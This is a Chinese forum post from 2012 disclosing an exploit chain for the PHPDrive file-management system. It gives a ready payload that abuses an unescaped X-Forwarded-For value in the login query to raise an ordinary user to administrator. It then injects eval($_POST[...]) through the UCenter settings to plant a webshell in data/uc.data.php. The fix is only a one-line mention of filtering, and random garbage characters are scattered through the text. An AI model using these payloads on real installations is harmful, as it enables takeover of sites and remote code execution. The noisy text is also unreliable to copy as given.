PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等9 Q2 Z' [3 a4 K4 R9 U; R+ g1 j5 h
2 n7 K% _0 h& i, w; h7 Y" a G
includes/user.lib.php9 w% u+ A9 ~: I2 i4 G
行87
& z9 O. y4 J$ U' z& o& h$ U function get_ip() {+ z$ S+ h- L& l' Q2 Q. L
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.% [ e& [1 {% X% L& H# {6 O
在用户注册与登录 处module/disk/account.lead.php$ [8 v* d2 V0 u7 {( z5 o
198行 0 K: k, P/ c Q. S; w. i
//更新本次登录IP和时间
. D% I- v- x. _( B $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
# D8 {2 \& a2 O, W由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限+ j# s! ~! O5 A* x/ ]/ `
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
2 a2 M* y% g# `# ]4 |# e后台getshell:, |) R; @; _: V. m+ J; v
在UCenter设置处,将UC数据库登录名填写为, m& I4 y: _8 @/ @0 h' G
1 q; |$ C" H g4 M. z( uroot’);eval($_POST[DisKill]);?>/*
4 k8 G( L4 \' o0 E3 I/ x5 u可以得到一个shell,位置在 data/uc.data.php
3 }) _( Z, M/ K2 t7 t8 Z
2 x( V; L. W) i$ S+ z* N, c4 T修复:过滤注入% y. x3 M3 u8 i0 L
; n- |1 L4 |( S0 [- ^; I |
发表于 2012-12-31 09:18:34
收藏
支持
反对